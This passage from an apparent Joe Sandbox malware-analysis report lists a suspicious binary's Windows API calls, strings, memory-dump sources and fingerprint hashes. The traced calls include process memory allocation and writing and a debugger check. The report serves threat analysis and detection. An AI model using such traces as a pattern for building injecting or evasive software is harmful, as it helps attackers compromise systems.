                                                                                                                                          • Part of subcall function 00571BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00569E12,00000034,?,?,00001004,00000000,00000000), ref: 00571C2E
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A464
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0056A4B1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                        • Opcode ID: 756dcdb471d28559ed50c56d32b58a3d51b4cfda8c482b7877e06fe64b19d760
                                                                                                                                        • Instruction ID: 068a5ef56c6e3eb320c304e1a96ff2ff147958e98d1946c80aebc4df26cf6f65
                                                                                                                                        • Opcode Fuzzy Hash: 756dcdb471d28559ed50c56d32b58a3d51b4cfda8c482b7877e06fe64b19d760
                                                                                                                                        • Instruction Fuzzy Hash: C9413C7290021DAFDF11DBA4DD85ADEBBB8FF45300F004095FA55B7181DA706E49DBA1
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00597A86
                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00597A9A
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00597ABE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window
                                                                                                                                        • String ID: SysMonthCal32
                                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                                        • Opcode ID: 10a635d87d38885199ed28e1b3328e897e0152ce43cfc00f1bbb7817a1963d8d
                                                                                                                                        • Instruction ID: e0a06d9832b6c05ed23b0a8c66083aadc087093a291f38927b424f09c4c7f9a8
                                                                                                                                        • Opcode Fuzzy Hash: 10a635d87d38885199ed28e1b3328e897e0152ce43cfc00f1bbb7817a1963d8d
                                                                                                                                        • Instruction Fuzzy Hash: D121A03261021DBBDF118E50CC46FEE3FA9FB8C714F110115FE156B190D6B1A9549BA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0059826F
                                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0059827D
                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00598284
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                                        • String ID: msctls_updown32
                                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                                        • Opcode ID: 1d2ed38a8f67986f6a07ae22de6bd68b59c33c4ec384dc2ae4afb354c4598086
                                                                                                                                        • Instruction ID: 6f070096da2dfe3b4d10b9c9285ce4e72104bd72627e5157e9d4e715004216aa
                                                                                                                                        • Opcode Fuzzy Hash: 1d2ed38a8f67986f6a07ae22de6bd68b59c33c4ec384dc2ae4afb354c4598086
                                                                                                                                        • Instruction Fuzzy Hash: 63216DB5604209AFEF10DF54CC85DB73BEDFB5A354B140059F90197291DB70EC11DAA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00597360
                                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00597370
                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00597395
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                                        • String ID: Listbox
                                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                                        • Opcode ID: 0efcded8790d776bdfdca75222b4819622876bd1cae609d574515331ccf6f52d
                                                                                                                                        • Instruction ID: f42e503cc4f244cd3464eecb031d511c54d444ca1cdf9561bc2966643e6c2e33
                                                                                                                                        • Opcode Fuzzy Hash: 0efcded8790d776bdfdca75222b4819622876bd1cae609d574515331ccf6f52d
                                                                                                                                        • Instruction Fuzzy Hash: 5421B032624118BFEF118F54CC85EBF3FAAFB8D754F118525F9049B190C671AC519BA0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00597D97
                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00597DAC
                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00597DB9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                        • Opcode ID: c062e5fd6d55742d4ca8c88d5e52402ac5e8137720908425b604f4116d2d9060
                                                                                                                                        • Instruction ID: ce2dbf984618489729ac40c8390cb8b022893b18dc2bc1ec6e5530332b469964
                                                                                                                                        • Opcode Fuzzy Hash: c062e5fd6d55742d4ca8c88d5e52402ac5e8137720908425b604f4116d2d9060
                                                                                                                                        • Instruction Fuzzy Hash: 7B11C172254209BAEF209F64CC05FEB3BA9FF89B14F114519FA41A6090D6719851DB20
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0054B544: _memset.LIBCMT ref: 0054B551
                                                                                                                                          • Part of subcall function 00530B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0054B520,?,?,?,0051100A), ref: 00530B79
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 0054B524
                                                                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 0054B533
                                                                                                                                        Strings
                                                                                                                                        • =[, xrefs: 0054B514
                                                                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0054B52E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=[
                                                                                                                                        • API String ID: 3158253471-134945641
                                                                                                                                        • Opcode ID: 88e61815b3feadbefd54233102c3a6bce02267f7d509b3f42d637027c35ae810
                                                                                                                                        • Instruction ID: a45316d881f84fe2511fc61066d12f8b434fe8295f13cee39b9e62fd26d59ab2
                                                                                                                                        • Opcode Fuzzy Hash: 88e61815b3feadbefd54233102c3a6bce02267f7d509b3f42d637027c35ae810
                                                                                                                                        • Instruction Fuzzy Hash: 1DE06D702007118FE7209F39E4087C6BFE0BF28748F00891EE486C2781EBB5E548DB92
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0055027A,?), ref: 0058C6E7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0058C6F9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                                        • Opcode ID: a1ec9ca978c9a6f11f508deb53a28832113695fe71cadf0c9077676aacda3f9d
                                                                                                                                        • Instruction ID: 2cf221814ce1137db2ed32a29d4bfc6ce48641e13196516cbe10dde9f924bee5
                                                                                                                                        • Opcode Fuzzy Hash: a1ec9ca978c9a6f11f508deb53a28832113695fe71cadf0c9077676aacda3f9d
                                                                                                                                        • Instruction Fuzzy Hash: 9FE012795207128FEB206B25DC49F9A7ED8FF15755B50942DEC85E3290D770D840CF20
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00524B44,?,005249D4,?,?,005227AF,?,00000001), ref: 00524B85
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00524B97
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-3689287502
                                                                                                                                        • Opcode ID: 5407d14c69099f71adb575b52361980e4e75709c38960ce76b5dbce0c59bdf2e
                                                                                                                                        • Instruction ID: 9513eafff95240e2dd240e2c6fd21b2ec08680f3b475e9ebb4df2e39a5e07c95
                                                                                                                                        • Opcode Fuzzy Hash: 5407d14c69099f71adb575b52361980e4e75709c38960ce76b5dbce0c59bdf2e
                                                                                                                                        • Instruction Fuzzy Hash: B3D017705207328FDB209F71EC58B4A7AE4BF1A391F11982ED486E25E0E674E880DE10
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00524AF7,?), ref: 00524BB8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00524BCA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-1355242751
                                                                                                                                        • Opcode ID: a9e77181252a12ec789b6effac66f3b426cc49a7d503cb82e443de4c31670ce1
                                                                                                                                        • Instruction ID: e8f53b772e76cc1c0f658515b7860a9c2908c900fbd2d3c2eef39d809d86fd62
                                                                                                                                        • Opcode Fuzzy Hash: a9e77181252a12ec789b6effac66f3b426cc49a7d503cb82e443de4c31670ce1
                                                                                                                                        • Instruction Fuzzy Hash: 1DD01774520722CFDB209F71EC48B4B7AE5BF16391B11AC6ED496D29E4EAB4D880CA10
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,00591696), ref: 00591455
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00591467
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                                        • Opcode ID: 49f5714696878cdb41ca996a7c3076cc327018532df3018d3bf1d64be650e600
                                                                                                                                        • Instruction ID: 3a8478a572a0b67ceae8a10e03e45a3565c90acc367b03890bc44d99ec8702bb
                                                                                                                                        • Opcode Fuzzy Hash: 49f5714696878cdb41ca996a7c3076cc327018532df3018d3bf1d64be650e600
                                                                                                                                        • Instruction Fuzzy Hash: 14D01734520B238FDF209FB5DC08B467EE4BF1A395B19C82ED4DAD21A0EA70D8C0CA14
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00525E3D), ref: 005255FE
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00525610
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                                        • Opcode ID: d8eaf2f31a0c99eecdc2b3f9be45562d0cd2b352fe5cb92abc08f0c4aa4971d6
                                                                                                                                        • Instruction ID: 25fea86732aebbb037d37f2c2669c7f75afe3b26a30e0252b8bf8663f525737b
                                                                                                                                        • Opcode Fuzzy Hash: d8eaf2f31a0c99eecdc2b3f9be45562d0cd2b352fe5cb92abc08f0c4aa4971d6
                                                                                                                                        • Instruction Fuzzy Hash: 3ED01774930B228FEB209F31EC0865B7AE4BF16395B11E82AD486D22E1E670D880CA50
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,005893DE,?,005A0980), ref: 005897D8
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 005897EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-199464113
                                                                                                                                        • Opcode ID: b42207de46706df54c27b94890435697ea2f1554765e6452fea6535a41f282a9
                                                                                                                                        • Instruction ID: 74ac449d8cb2d457d0d409e722fd86300be716eec02519571e45dfd279231feb
                                                                                                                                        • Opcode Fuzzy Hash: b42207de46706df54c27b94890435697ea2f1554765e6452fea6535a41f282a9
                                                                                                                                        • Instruction Fuzzy Hash: EED012705207138FDB205F71DC896567AD4FF16391F15982DD885E2190DB70C880C711
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 94645d4c6464de39e706f3fd23badad96fbeec8067767b5f64ab4207763467d4
                                                                                                                                        • Instruction ID: 2d3e3c46dd71016531d7461730e16c65a4707b6f368f38addb224215c7e16c7a
                                                                                                                                        • Opcode Fuzzy Hash: 94645d4c6464de39e706f3fd23badad96fbeec8067767b5f64ab4207763467d4
                                                                                                                                        • Instruction Fuzzy Hash: 51C16075A0021AEFCB14CFA4C888DAEFBB5FF48714B158998E805DB251DB31ED85DB90
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0058E7A7
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 0058E7EA
                                                                                                                                          • Part of subcall function 0058DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058DEAE
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0058E9EA
                                                                                                                                        • _memmove.LIBCMT ref: 0058E9FD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3659485706-0
                                                                                                                                        • Opcode ID: bd29c6eed40d45575af5947611578b4cfe899b34f3268bff1e07722b1416a7cb
                                                                                                                                        • Instruction ID: 39161573ed8e6d21e3bf626430af1156cc2ef57632eb14b8b8ded4a9f6352f59
                                                                                                                                        • Opcode Fuzzy Hash: bd29c6eed40d45575af5947611578b4cfe899b34f3268bff1e07722b1416a7cb
                                                                                                                                        • Instruction Fuzzy Hash: 65C12471A083119FC714EF28C48596ABBF4FF89714F04896EF899AB351D731E946CB82
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 005887AD
                                                                                                                                        • CoUninitialize.OLE32 ref: 005887B8
                                                                                                                                          • Part of subcall function 0059DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00588A0E,?,00000000), ref: 0059DF71
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 005887C3
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00588A94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 780911581-0
                                                                                                                                        • Opcode ID: f6e80919f26e6dd2c546c57d32af786e76a650635c99375d03c6aa0e0086ef1c
                                                                                                                                        • Instruction ID: 28d4e3aaa240e9718115b113dccdc75ac95244ef0ecbaa785c52bf25705dd98f
                                                                                                                                        • Opcode Fuzzy Hash: f6e80919f26e6dd2c546c57d32af786e76a650635c99375d03c6aa0e0086ef1c
                                                                                                                                        • Instruction Fuzzy Hash: EBA14A75204B029FDB10EF54C485B6ABBE4FF88320F548849F995AB3A1DB30ED45CB92
                                                                                                                                        APIs
                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,005A3C4C,?), ref: 00568308
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,005A3C4C,?), ref: 00568320
